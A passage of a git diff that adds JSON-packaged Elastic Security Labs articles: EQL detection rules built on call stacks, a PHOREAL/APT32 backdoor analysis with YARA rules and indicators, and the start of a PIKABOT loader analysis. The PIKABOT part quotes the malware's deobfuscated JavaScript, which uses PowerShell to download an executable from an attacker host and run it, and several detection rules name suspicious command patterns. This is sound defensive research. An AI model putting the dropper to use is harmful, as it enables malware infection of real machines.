\n\nprocess.name : (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\") and\n\n_arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info:\n (\"*!OleSaveToStream*\", \"*!OleLoad*\")) and\n(\n file.extension : (\"exe\", \"dll\", \"js\", \"vbs\", \"vbe\", \"jse\", \"url\", \n \"chm\", \"bat\", \"mht\", \"hta\", \"htm\", \"search-ms\") or\n\n /* PE & HelpFile */\n file.Ext.header_bytes : (\"4d5a*\", \"49545346*\")\n )\n```\n\nExamples of matches: \n\n\n\n### Suspicious File Rename from Unbacked Memory\nCertain ransomware may inject into signed processes before starting their encryption routine. File rename and modification events will appear to originate from a trusted process, potentially bypassing some heuristics that exclude signed processes as presumed false positives. The following EQL query looks for file renames of documents from a signed binary with a suspicious call stack: \n\n```\nfile where event.action : \"rename\" and \n \nprocess.code_signature.status : \"trusted\" and file.extension != null and \n\nfile.Ext.original.name : (\"*.jpg\", \"*.bmp\", \"*.png\", \"*.pdf\", \"*.doc\", \n\"*.docx\", \"*.xls\", \"*.xlsx\", \"*.ppt\", \"*.pptx\") and\n\nnot file.extension : (\"tmp\", \"~tmp\", \"diff\", \"gz\", \"download\", \"bak\", \n\"bck\", \"lnk\", \"part\", \"save\", \"url\", \"jpg\", \"bmp\", \"png\", \"pdf\", \"doc\", \n\"docx\", \"xls\", \"xlsx\", \"ppt\", \"pptx\") and \n\nprocess.thread.Ext.call_stack_summary :\n(\"ntdll.dll|kernelbase.dll|Unbacked\",\n \"ntdll.dll|kernelbase.dll|kernel32.dll|Unbacked\", \n \"ntdll.dll|kernelbase.dll|Unknown|kernel32.dll|ntdll.dll\", \n \"ntdll.dll|kernelbase.dll|kernel32.dll|Unknown|kernel32.dll|ntdll.dll\", \n \"ntdll.dll|kernelbase.dll|kernel32.dll|mscorlib.ni.dll|Unbacked\", \n \"ntdll.dll|wow64.dll|wow64cpu.dll|wow64.dll|ntdll.dll|kernelbase.dll|\n Unbacked\", \"ntdll.dll|wow64.dll|wow64cpu.dll|wow64.dll|ntdll.dll|\n 
kernelbase.dll|Unbacked|kernel32.dll|ntdll.dll\", \n \"ntdll.dll|Unbacked\", \"Unbacked\", \"Unknown\")\n```\n\nHere are some examples of matches where **explorer.exe** (Windows Explorer) is injected by the [KNIGHT/CYCLOPS](https://www.bleepingcomputer.com/news/security/knight-ransomware-distributed-in-fake-tripadvisor-complaint-emails/) ransomware: \n\n\n\n### Executable File Dropped by an Unsigned Service DLL\nCertain types of malware maintain their presence by disguising themselves as Windows service DLLs. To be recognized and managed by the Service Control Manager, a service DLL must export a function named **ServiceMain**. The KQL query below helps identify instances where an executable file is created and the call stack includes the **ServiceMain** function.\n\n```\nevent.category : file and \n file.Ext.header_bytes : 4d5a* and process.name : svchost.exe and \n process.thread.Ext.call_stack.symbol_info : *!ServiceMain*\n```\n\n\n\n## Library\n\n### Unsigned Print Monitor Driver Loaded\nThe following EQL query identifies the loading of an unsigned library by the print spooler service where the call stack indicates the load is coming from **SplAddMonitor**. Adversaries may use [port monitors](https://attack.mitre.org/techniques/T1547/010/) to run an adversary-supplied DLL during system boot for persistence or privilege escalation.\n\n```\nlibrary where\nprocess.executable : (\"?:\\\\Windows\\\\System32\\\\spoolsv.exe\", \n\"?:\\\\Windows\\\\SysWOW64\\\\spoolsv.exe\") and not dll.code_signature.status : \n\"trusted\" and _arraysearch(process.thread.Ext.call_stack, $entry, \n$entry.symbol_info: \"*localspl.dll!SplAddMonitor*\")\n```\n\nExample of match: \n\n\n\n### Potential Library Load via ROP Gadgets\nThis EQL rule identifies the loading of a library from unusual **win32u** or **ntdll** offsets. 
This may indicate an attempt to bypass API monitoring using Return Oriented Programming (ROP) assembly gadgets to execute a syscall instruction from a trusted module.\n\n```\nlibrary where\n// adversaries try to use ROP gadgets from ntdll.dll or win32u.dll \n// to construct a normal-looking call stack\n\nprocess.thread.Ext.call_stack_summary : (\"ntdll.dll|*\", \"win32u.dll|*\") and \n\n// excluding normal Library Load APIs - LdrLoadDll and NtMapViewOfSection\nnot _arraysearch(process.thread.Ext.call_stack, $entry, \n $entry.symbol_info: (\"*ntdll.dll!Ldr*\", \n \"*KernelBase.dll!LoadLibrary*\", \"*ntdll.dll!*MapViewOfSection*\"))\n```\n\nThis example matches when [AtomLdr](https://www.kitploit.com/2023/06/atomldr-dll-loader-with-advanced.html) loads a DLL using ROP gadgets from **win32u.dll** instead of using **ntdll**’s load library APIs (**LdrLoadDll** and **NtMapViewOfSection**).\n\n\n\n### Evasion via LdrpKernel32 Overwrite\nThe [LdrpKernel32](https://github.com/rbmm/LdrpKernel32DllName) evasion is an interesting technique to hijack the early execution of a process during the bootstrap phase by overwriting the bootstrap DLL name referenced in **ntdll.dll** memory, forcing the process to load a malicious DLL. 
\n\n```\nlibrary where \n \n// BaseThreadInitThunk must be exported by the rogue bootstrap DLL\n _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info :\n \"*!BaseThreadInitThunk*\") and\n\n// excluding kernel32, which normally exports BaseThreadInitThunk\nnot _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info :\n (\"?:\\\\Windows\\\\System32\\\\kernel32.dll!BaseThreadInitThunk*\", \n \"?:\\\\Windows\\\\SysWOW64\\\\kernel32.dll!BaseThreadInitThunk*\", \n \"?:\\\\Windows\\\\WinSxS\\\\*\\\\kernel32.dll!BaseThreadInitThunk*\", \n \"?:\\\\Windows\\\\WinSxS\\\\Temp\\\\PendingDeletes\\\\*!BaseThreadInitThunk*\", \n \"\\\\Device\\\\*\\\\Windows\\\\*\\\\kernel32.dll!BaseThreadInitThunk*\"))\n```\n\nExample of match: \n\n\n## Suspicious Remote Registry Modification\nSimilar to the scheduled task example, the Remote Registry service is hosted in **svchost.exe**. We can use the call stack to detect registry modifications made via the Remote Registry service where the written value points to an executable or script file. 
This may indicate an attempt to move laterally via remote configuration changes.\n\n```\nregistry where \n\nevent.action == \"modification\" and \n\nuser.id : (\"S-1-5-21*\", \"S-1-12-*\") and \n\n process.name : \"svchost.exe\" and \n\n// The regsvc.dll in the call stack indicates that this is indeed the \n// svchost.exe instance hosting the Remote Registry service\n\nprocess.thread.Ext.call_stack_summary : \"*regsvc.dll|rpcrt4.dll*\" and\n\n (\n // suspicious registry values\n registry.data.strings : (\"*:\\\\*\\\\*\", \"*.exe*\", \"*.dll*\", \"*rundll32*\", \n \"*powershell*\", \"*http*\", \"* /c *\", \"*COMSPEC*\", \"\\\\\\\\*.*\") or\n \n // suspicious keys like Services, Run key and COM\n registry.path :\n (\"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"HKEY_USERS\\\\*Classes\\\\*\\\\InprocServer32\\\\\",\n \"HKEY_USERS\\\\*Classes\\\\*\\\\LocalServer32\\\\\",\n \"H*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\") or\n \n // potential attempt to remotely disable a service \n (registry.value : \"Start\" and registry.data.strings : \"4\")\n )\n```\n\nThis example matches when the Run key registry value is modified remotely via the Remote Registry service: \n\n\n\n## Conclusion\nAs we’ve demonstrated, call stacks are not only useful for finding known bad patterns, but also for reducing ambiguity in standard EDR events and easing behavior interpretation. The examples we've provided here represent just a small portion of the detection possibilities achievable by applying enhanced enrichment to the same dataset.\n"
+ },
+ "title": "Peeling back the curtain with call stacks",
+ "slug": "peeling-back-the-curtain-with-call-stacks",
+ "date": "2023-09-13",
+ "description": "In this article, we'll show you how we contextualize rules and events, and how you can leverage call stacks to better understand any alerts you encounter in your environment.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ }
+ ],
+ "image": "photo-edited-10@2x.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ },
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ "detection engineering",
+ "threat hunting",
+ "threat detection"
+ ]
+ },
+ "id": "security_labs_content-peeling_back_the_curtain_with_call_stacks-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-phoreal_malware_targets_the_southeast_asian_financial_sector-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-phoreal_malware_targets_the_southeast_asian_financial_sector-md.json
new file mode 100644
index 00000000000..c82f38a8c08
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-phoreal_malware_targets_the_southeast_asian_financial_sector-md.json
@@ -0,0 +1,45 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"PHOREAL Malware Targets the Southeast Asian Financial Sector\"\nslug: \"phoreal-malware-targets-the-southeast-asian-financial-sector\"\ndate: \"2023-03-02\"\ndescription: \"Elastic Security discovered PHOREAL malware, which is targeting Southeast Asia financial organizations, particularly those in the Vietnamese financial sector.\"\nauthor:\n - slug: daniel-stepanic\n - slug: derek-ditch\n - slug: joe-desimone\n - slug: remco-sprooten\n - slug: andrew-pease\n - slug: cyril-francois\nimage: \"blog-thumb-roman-columns.jpg\"\ncategory:\n - slug: campaigns\ntags:\n - phoreal\n - rizzo\n - malware\n - backdoor\n---\n\n## Preamble\n\nElastic Security has identified an ongoing campaign targeting a Vietnamese financial services institution with the PHOREAL/RIZZO backdoor. While this malware has been in use for some time, this is the first time that we have observed it loading into memory as a defense evasion and campaign protection technique. Upon analysis of our own observations and previously reported information, we are tracking this activity group (malware + technique + victimology) as REF4322.\n\n### What is the threat?\n\nPHOREAL/RIZZO is a backdoor allowing initial victim characterization and follow-on post-exploitation operations to compromise the confidentiality of organizations’ data. 
It has been reported in other research as being used exclusively by APT32 (AKA SeaLotus, OceanLotus, APT-C-00, Group G0050).\n\n### What is the impact?\n\nAPT32 largely targets victims with political or economic interests in Southeast Asia, specifically Vietnam.\n\n### What is Elastic doing about it?\n\nElastic Security detailed how to triage one of these threat alerts, extracted observables for endpoint and network filtering, and produced a new malware signature for identification and mitigation of the threat across the fleet of deployed Elastic Agents.\n\n## Investigation Details\n\nWhile conducting Threat Discovery & Monitoring operations, Elastic Security researchers identified a cluster of shellcode_thread Windows memory protection alerts generated from an Elastic Agent endpoint sensor. These particular alerts were interesting because they all occurred within the same cluster, and unusually they targeted the control.exe process. The Windows control.exe process handles the execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\n\nGenerally when we observe false positives for the shellcode_thread protection, it is identified across a broad user-base and in many cases it is attributed to various gaming anti-cheat or DRM (Digital Rights Management) mechanisms. 
In this case, a single cluster and a Microsoft signed target process was atypical, and worthy of further investigation.\n\n> You can read more about Elastic Security’s memory protections [HERE](https://www.elastic.co/blog/whats-new-elastic-security-7-15-0#:~:text=Memory%20threat%20protection%20for%20Windows%20endpoints) and about in-memory attacks [HERE](https://www.elastic.co/blog/hunting-memory).\n\nWith our interest piqued from the outlier characteristics of the alerts, we investigated further to validate and characterize the threat:\n\n**Targeted process is a signed Windows binary**\n\n```\n...\n\"process\": {\n \"args\": [\n \"control.exe\",\n \"Firewall.cpl\",\n \"{2D48D219-C306-4349-AE1F-09744DFFB5B9}\"\n ],\n \"Ext\": {\n \"code_signature\": [\n {\n \"trusted\": true,\n \"subject_name\": \"Microsoft Windows\",\n \"exists\": true,\n \"status\": \"trusted\"\n }\n ],\n \"dll\": [\n...\n\n```\n\n**Unsigned loaded .dll**\n\n```\n...\n \"Ext\": {\n \"mapped_address\": 1945501696,\n \"mapped_size\": 21135360\n },\n \"path\": \"C:\\\\Windows\\\\SysWOW64\\\\tscon32.dll\",\n \"code_signature\": [\n {\n \"exists\": false\n }\n ],\n \"name\": \"tscon32.dll\",\n \"hash\": {\n \"sha1\": \"007970b7a42852b55379ef4cffa4475865c69d48\",\n \"sha256\": \"ec5d5e18804e5d8118c459f5b6f3ca96047d629a50d1a0571dee0ac8d5a4ce33\",\n \"md5\": \"2b6da20e4fc1af2c5dd5c6f6191936d1\"\n }\n },\n...\n\n```\n\n**Starting module from the alerting thread**\n\n```\n...\n \"pe\": {\n \"original_file_name\": \"CONTROL.EXE\"\n },\n \"name\": \"control.exe\",\n \"pid\": 5284,\n \"thread\": {\n \"Ext\": {\n \"start_address_module\": \"C:\\\\Windows\\\\SysWOW64\\\\tscon32.dll\",\n...\n\n```\n\n**Alerting memory region metadata**\n\n```\n...\n\"memory_region\": {`\n \"region_size\": 73728,\n \"region_protection\": \"RWX\",\n \"allocation_base\": 81395712,\n \"bytes_allocation_offset\": 0,\n \"allocation_type\": \"PRIVATE\",\n \"memory_pe_detected\": true,\n \"region_state\": \"COMMIT\",\n \"strings\": [\n 
\"QSSSSSSh \",\n ...\n \"bad cast\",\n \"Local\\\\{5FBC3F53-A76D-4248-969A-31740CBC8AD6}\",\n \"Netapi32.dll\",\n \"NetWkstaGetInfo\",\n \"NetApiBufferFree\",\n \"\\\\\\\\.\\\\pipe\\\\{A06F176F-79F1-473E-AF44-9763E3CB34E5}\",\n \"list too long\",\n \"{FD5F8447-657A-45C1-894B-D533926C9B66}.dll\",\n \"DllEntry\",\n ...\n \".?AVbad_alloc@std@@\",\n \"C:\\\\Windows\\\\syswow64\\\\control.exe\",\n \":z:zzzzzz7\",\n ...\n \"InternalName\",\n \"mobsync.exe\",\n \"LegalCopyright\",\n...\n\n```\n\n**Thread data for pivoting**\n\n```\n...\n\"thread\": {\n \"Ext\": {\n \"start_address_bytes\": \"8bff558bece8e6430000e8db43000050e8bb43000085c0751fff7508e8c94300\",\n ...\n \"start_address_bytes_disasm\": \"mov edi, edi\\npush ebp\\nmov ebp, esp\\ncall 0x000043f0\\ncall 0x000043ea\\npush eax\\ncall 0x000043d0\\ntest eax, eax\\njnz 0x00000038\\npush dword ptr [ebp+0x08]\"\n },\n...\n\n```\n\nFrom the example alert we first identify the start_address_module which is the dll/module where the thread began. C:\\\\Windows\\\\SysWOW64\\\\tscon32.dll is the start_address_module for the thread that we’ve alerted on. It’s also the only unsigned dll loaded, so a great place to focus our efforts. When checking the hash value in VirusTotal, to identify previously disclosed information about the sample, we did not see any results.\n\nDigging deeper, we looked at the start_address_bytes, which are the first 32 bytes of our alerting thread. We can use the value of the start_address_bytes (8bff558bece8e6430000e8db43000050e8bb43000085c0751fff7508e8c94300) to search for pivots in VirusTotal by querying content: \\{8bff558bec56e83f3e0000e8343e000050e8143e000085c0752a8b750856e821\\}. 
We identified relatively few results, but they included [the below entry](https://www.virustotal.com/gui/file/88f073552b30462a00d1d612b1638b0508e4ef02c15cf46203998091f0aef4de) first submitted in July 2021.\n\n\n\nIn researching the results from VirusTotal, we could see that threat researcher Felix Bilstein ([@fxb_b](https://twitter.com/fxb_b)) authored a crowdsourced YARA rule identifying this as the [PHOREAL](https://attack.mitre.org/software/S0158/) backdoor. Moving on to the CONTENT tab, we can compare some of the strings from our alert with what has been previously reported to VirusTotal.\n\n\n\nUsing the unique strings we identified above and the start_address_bytes, we can create a YARA signature by converting the unique strings ($a) and the start\\_address\\_bytes ($b) into hex values as shown below.\n\n**Converted YARA strings**\n\n```\nstrings:\n \\\\ \"\\\\.\\pipe\\{A06F176F-79F1-473E-AF44-9763E3CB34E5}\" ascii wide\n $a1 = { 5C 00 5C 00 2E 00 5C 00 70 00 69 00 70 00 65 00 5C 00 7B 00 41 00\n 30 00 36 00 46 00 31 00 37 00 36 00 46 00 2D 00 37 00 39 00 46 00\n 31 00 2D 00 34 00 37 00 33 00 45 00 2D 00 41 00 46 00 34 00 34 00\n 2D 00 39 00 37 00 36 00 33 00 45 00 33 00 43 00 42 00 33 00 34 00\n 45 00 35 00 7D 00 }\n\n \\\\ \"Local\\{5FBC3F53-A76D-4248-969A-31740CBC8AD6}\" ascii wide\n $a2 = { 4C 00 6F 00 63 00 61 00 6C 00 5C 00 7B 00 35 00 46 00 42 00 43 00\n 33 00 46 00 35 00 33 00 2D 00 41 00 37 00 36 00 44 00 2D 00 34 00\n 32 00 34 00 38 00 2D 00 39 00 36 00 39 00 41 00 2D 00 33 00 31 00\n 37 00 34 00 30 00 43 00 42 00 43 00 38 00 41 00 44 00 36 00 7D 00 }\n\n \\\\ \"{FD5F8447-657A-45C1-894B-D533926C9B66}.dll\" ascii\n $a3 = { 7B 46 44 35 46 38 34 34 37 2D 36 35 37 41 2D 34 35 43 31 2D 38 39\n 34 42 2D 44 35 33 33 39 32 36 43 39 42 36 36 7D 2E 64 6C 6C }\n\n \\\\ PHOREAL start_address_bytes sequence\n \\\\ mov edi, edi; push ebp; mov ebp, esp; call 0x000043f0;\n \\\\ call 0x000043ea; push eax; call 0x000043d0; test eax, eax;\n \\\\ jnz 0x00000038; push 
dword ptr [ebp+0x08]\n $str_addr = { 8B FF 55 8B EC 56 E8 3F 3E 00 00 E8 34 3E 00 00 50 E8 14 3E\n 00 00 85 C0 75 2A 8B 75 08 56 E8 21 }\ncondition:\n 2 of them\n\n```\n\nThis rule when deployed to the Elastic Agent will identify PHOREAL to customers and backstop prevention already provided through the shellcode_thread memory protection (in customer environments with memory protection turned on). In our case this rule’s deployment also enabled the collection of the malicious thread using the same mechanism detailed in our [Collecting Cobalt Strike Beacons](https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack) article.\n\nShortly after the new YARA artifact was deployed we had a new malware_signature alert in hand with the malicious thread captured from memory. Manual binary triage from our Malware Analysis and Reverse Engineering (MARE) Team quickly confirmed the sample was PHOREAL/RIZZO by comparing the structure and functions between our sample and past reporting. Further, they were able to extract an RC4 encrypted domain from an [RCDATA resource](https://docs.microsoft.com/en-us/windows/win32/menurc/rcdata-resource) as described in a [2018 CYLANCE OceanLotus whitepaper](https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2018/2018.10.17.OceanLotus_SpyRATs/SpyRATsofOceanLotusMalwareWhitePaper.pdf).\n\n\n\nThe domain identified by MARE (thelivemusicgroup[.]com) currently resolves to 103.75.117[.]250 which is owned by Oneprovider[.]com, a dedicated server hosting company based out of Canada with data centers distributed globally.\n\n**https://ipinfo.io/ query results for 103.75.117[.]250**\n\n```\n{\n \"ip\": \"103.75.117[.]250\",\n \"city\": \"Hong Kong\",\n \"region\": \"Central and Western\",\n \"country\": \"HK\",\n \"loc\": \"22.2783,114.1747\",\n \"org\": \"AS133752 Leaseweb Asia Pacific pte. 
ltd.\",\n \"timezone\": \"Asia/Hong_Kong\",\n \"asn\": {\n \"asn\": \"AS133752\",\n \"name\": \"Leaseweb Asia Pacific pte. ltd.\",\n \"domain\": \"leaseweb.com\",\n \"route\": \"103.75.117[.]0/24\",\n \"type\": \"hosting\"\n },\n \"company\": {\n \"name\": \"Oneprovider.com - Hong Kong Infrastructure\",\n \"domain\": \"oneprovider[.]com\",\n \"type\": \"hosting\"\n },\n \"privacy\": {\n \"vpn\": false,\n \"proxy\": false,\n \"tor\": false,\n \"relay\": false,\n \"hosting\": true,\n \"service\": \"\"\n },\n \"abuse\": {\n \"address\": \"1500 Ste-Rose LAVAL H7R 1S4 Laval Quebec, Canada\",\n \"country\": \"CA\",\n \"email\": \"info@oneprovider.com\",\n \"name\": \"ONE PROVIDER\",\n \"network\": \"103.75.117[.]0/24\",\n \"phone\": \"+1 514 286-0253\"\n },\n \"domains\": {\n \"ip\": \"103.75.117[.]250\",\n \"total\": 2,\n \"domains\": [\n \"thelivemusicgroup[.]com\",\n \"cdn-api-cn-1[.]com\"\n ]\n }\n\n```\n\nMost of the interesting information about the domain is privacy guarded, but the “Updated” and “Created” dates in the below figure might be useful for bounding how long this domain has been used maliciously.\n\n![https://lookup.icann.org/lookup for thelivemusicgroup[.]com](/assets/images/phoreal-malware-targets-the-southeast-asian-financial-sector/https-lookup.jpg)\n\nThe Elastic Agent appears to have been deployed post-compromise which limited our ability to determine the vector of initial access. 
A [2017 Mandiant report](https://www.mandiant.com/resources/cyber-espionage-apt32) indicates that PHOREAL may be deployed in an “establish foothold” capacity to allow for victim triage and follow-on post-exploitation tools.\n\n## Analysis\n\nElastic Security utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between the adversaries and victims of intrusions.\n\n\n\n### Adversary Assessment Justification\n\nWe assess with high confidence based on observed activity and previous reporting that REF4322 is [APT32/OceanLotus](https://attack.mitre.org/groups/G0050/) and the actor behind this incident. APT32 has been active since 2014 [notably targeting](https://www.mandiant.com/resources/cyber-espionage-apt32) Southeast Asian governments and businesses or other international businesses with interests in Vietnam. APT32 is the only group currently identified as operating the PHOREAL backdoor, and our victim matches the geographic and industry vertical profile of typical and specific prior APT32 victims.\n\n## Conclusion\n\n### YARA Rules\n\nWe have created a YARA rule to identify this PHOREAL activity.\n\n**Yara rule to detect REF4322/APT32 in-memory backdoor PHOREAL/Rizzo**\n\n```\nrule Windows_Trojan_PHOREAL {\n meta:\n Author = \"Elastic Security\"\n creation_date = \"2022-02-16\"\n last_modified = \"2022-02-16\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"PHOREAL\"\n threat_name = \"Windows.Trojan.PHOREAL\"\n description = \"Detects REF4322/APT32 in-memory backdoor PHOREAL/Rizzo.\"\n reference_sample = \"88f073552b30462a00d1d612b1638b0508e4ef02c15cf46203998091f0aef4de\"\n\n\n strings:\n \\\\ \"\\\\.\\pipe\\{A06F176F-79F1-473E-AF44-9763E3CB34E5}\" ascii wide\n $a1 = { 5C 00 5C 00 2E 00 5C 00 70 00 69 00 70 00 65 00 5C 00 7B 00 41 00\n 30 00 36 00 46 00 31 00 37 00 36 00 46 00 2D 00 37 00 39 00 46 00\n 31 00 2D 00 34 00 37 00 33 00 45 00 2D 00 41 00 46 
00 34 00 34 00\n 2D 00 39 00 37 00 36 00 33 00 45 00 33 00 43 00 42 00 33 00 34 00\n 45 00 35 00 7D 00 }\n\n \\\\ \"Local\\{5FBC3F53-A76D-4248-969A-31740CBC8AD6}\" ascii wide\n $a2 = { 4C 00 6F 00 63 00 61 00 6C 00 5C 00 7B 00 35 00 46 00 42 00 43 00\n 33 00 46 00 35 00 33 00 2D 00 41 00 37 00 36 00 44 00 2D 00 34 00\n 32 00 34 00 38 00 2D 00 39 00 36 00 39 00 41 00 2D 00 33 00 31 00\n 37 00 34 00 30 00 43 00 42 00 43 00 38 00 41 00 44 00 36 00 7D 00 }\n\n \\\\ \"{FD5F8447-657A-45C1-894B-D533926C9B66}.dll\" ascii\n $a3 = { 7B 46 44 35 46 38 34 34 37 2D 36 35 37 41 2D 34 35 43 31 2D 38 39\n 34 42 2D 44 35 33 33 39 32 36 43 39 42 36 36 7D 2E 64 6C 6C }\n\n \\\\ PHOREAL start_address_bytes sequence\n $str_addr = { 8B FF 55 8B EC 56 E8 3F 3E 00 00 E8 34 3E 00 00 50 E8 14 3E\n 00 00 85 C0 75 2A 8B 75 08 56 E8 21 }\n condition:\n 2 of them\n}\n\n```\n\n### Defensive Recommendations\n\nThe following steps can be leveraged to improve a network’s protective posture:\n\n1. Enable Elastic Security Memory Protection on Windows endpoints\n2. Leverage the included YARA signatures above to determine if PHOREAL activity exists within your organization\n3. 
Monitor or block network traffic to or from identified network IOCs and remediate impacted systems accordingly.\n\n### References\n\nThe following research was referenced throughout the document:\n\n- [https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2018/2018.10.17.OceanLotus_SpyRATs/SpyRATsofOceanLotusMalwareWhitePaper.pdf](https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2018/2018.10.17.OceanLotus_SpyRATs/SpyRATsofOceanLotusMalwareWhitePaper.pdf)\n- [https://www.mandiant.com/resources/cyber-espionage-apt32](https://www.mandiant.com/resources/cyber-espionage-apt32)\n- [https://www.secureworks.com/research/threat-profiles/tin-woodlawn](https://www.secureworks.com/research/threat-profiles/tin-woodlawn)\n- [https://attack.mitre.org/software/S0158/](https://attack.mitre.org/software/S0158/)\n- [https://attack.mitre.org/groups/G0050/](https://attack.mitre.org/groups/G0050/)\n\n### Observables\n\n| Indicator | Type | Reference | Notes |\n| ---------------------------------------------------------------- | ----------- | ----------- | -------------------------------------- |\n| thelivemusicgroup[.]com | domain-name | | C2 domain encrypted in malware |\n| 103.75.117[.]250 | ipv4-addr | | Resolved IP of thelivemusicgroup[.]com |\n| ec5d5e18804e5d8118c459f5b6f3ca96047d629a50d1a0571dee0ac8d5a4ce33 | SHA256 | tscon32.dll | PHOREAL dll |\n\n## Artifacts\n\nArtifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltecdb2d74a5c6ce1b/628e88d96f81705517a1f25b/phoreal-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n"
+ },
+ "title": "PHOREAL Malware Targets the Southeast Asian Financial Sector",
+ "slug": "phoreal-malware-targets-the-southeast-asian-financial-sector",
+ "date": "2023-03-02",
+ "description": "Elastic Security discovered PHOREAL malware, which is targeting Southeast Asia financial organizations, particularly those in the Vietnamese financial sector.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "derek-ditch"
+ },
+ {
+ "slug": "joe-desimone"
+ },
+ {
+ "slug": "remco-sprooten"
+ },
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "cyril-francois"
+ }
+ ],
+ "image": "blog-thumb-roman-columns.jpg",
+ "category": [
+ {
+ "slug": "campaigns"
+ }
+ ],
+ "tags": [
+ "phoreal",
+ "rizzo",
+ "malware",
+ "backdoor"
+ ]
+ },
+ "id": "security_labs_content-phoreal_malware_targets_the_southeast_asian_financial_sector-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-pikabot_i_choose_you-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-pikabot_i_choose_you-md.json
new file mode 100644
index 00000000000..4bb07a167b4
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-pikabot_i_choose_you-md.json
@@ -0,0 +1,32 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"PIKABOT, I choose you!\"\nslug: \"pikabot-i-choose-you\"\ndate: \"2024-02-24\"\ndescription: \"Elastic Security Labs observed new PIKABOT campaigns, including an updated version. PIKABOT is a widely deployed loader malicious actors utilize to distribute additional payloads.\"\nauthor:\n - slug: daniel-stepanic\n - slug: salim-bitam\nimage: \"photo-edited-02.png\"\ncategory:\n - slug: campaigns\ntags:\n - pikabot\n - loader\n - syscalls\n---\n\n## PIKABOT at a glance\n\nPIKABOT is a widely deployed loader malicious actors utilize to distribute payloads such as Cobalt Strike or launch ransomware. On February 8th, the Elastic Security Labs team observed new PIKABOT campaigns, including an updated variant. This version of the PIKABOT loader uses a new unpacking method and heavy obfuscation. The core module has added a new string decryption implementation, changes to obfuscation functionality, and various other modifications.\n\n\nThis post will highlight the initial campaign, break down the new loader functionality, and review the core components. There are interesting design choices in this new update that we think are the start of a new codebase that will make further improvements over time. While the functionality is similar to previous builds, these new updates have likely broken signatures and previous tooling. \n\nDuring the development of this research, the ThreatLabz team at Zscaler released great [analysis](https://www.zscaler.com/blogs/security-research/d-evolution-pikabot) and insights into a sample overlapping with those in this post. 
We suggest reading their work along with ours to understand these PIKABOT changes comprehensively.\n\n### Key takeaways\n\n - Fresh campaigns involving significant updates to the PIKABOT loader and core components \n - PIKABOT loader uses a new unpacking technique of combining scattered chunks of encrypted data in base64 format from `.data` section\n - Changes in the core include toned-down obfuscation and in-line RC4 functions, plaintext configuration at runtime, removal of AES during network communications\n - PIKABOT development appears as a work-in-progress, with future updates likely imminent\n - Call-stack visibility using Elastic Security provides the ability to triage threats like PIKABOT rapidly\n\n#### PIKABOT campaign overview\n\n\n\n\nAs the new year started, PIKABOT distribution remained inactive until approximately two weeks ago. This new campaign on February 8th involved emails with hyperlinks that led to ZIP archive files containing a malicious obfuscated Javascript script. \n\n\n\n\nBelow are the contents of the obfuscated JavaScript file, showing the next sequence to download and execute PIKABOT’s loader using PowerShell.\n\n```JavaScript\n// deobfuscated\nvar sites = ['https://gloverstech[.]com/tJWz9/', '', '']\nfor (var i = 0x0; i < 3; i++)\n{\n\tvar obj = new ActiveXObject(\"WScript.Shell\")\n\tobj['Run'](\"powershell Invoke-WebRequest https://gloverstech[.]com/tJWz9/0.2343379541861872.dat -OutFile %SYSTEMDRIVE%\\\\Users\\\\Public\\\\Jrdhtjydhjf.exe; saps %SYSTEMDRIVE%\\\\Users\\\\Public\\\\Jrdhtjydhjf.exe\")\n}\n```\n\n## PIKABOT loader\n\n### Loader stage 1\n\nTo appear authentic, the developer tampered with a legitimate search and replace tool called ```grepWinNP3.exe``` from [this](https://github.com/rizonesoft/Notepad3) repository. 
Using our internal sandboxing project ([Detonate](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate)) and leveraging Elastic Defend’s [call stack feature](https://www.elastic.co/security-labs/peeling-back-the-curtain-with-call-stacks) provided a detailed trace of the execution, allowing us to pinpoint the entry point of malicious code. \n\nAn analysis of the call stack data reveals that execution begins at a call before offset ```0x81aa7``` within the malicious file; the execution then leaps to a memory allocation at a call prior to offset ```0x25d84```. Furthermore, it was observed that the process creation call stack is missing normal calls to ```KernelBase.dll!CreateProcessInternalW``` and ```ntdll.dll!NtCreateUserProcess```, due to the use of a syscall via shellcode execution residing in the [unbacked memory](https://www.elastic.co/security-labs/hunting-memory). By using this implementation, it will bypass user-mode hooks on WOW64 modules to evade EDR products. \n\n\n\n\nLooking into the offset ```0x81aa7``` of the malicious file and conducting a side-by-side code comparison with a verified, benign version of the ```grepWinNP3.exe``` file, we identified something distinct and unusual: a hardcoded address to execute the PIKABOT loader, this marks the entrypoint 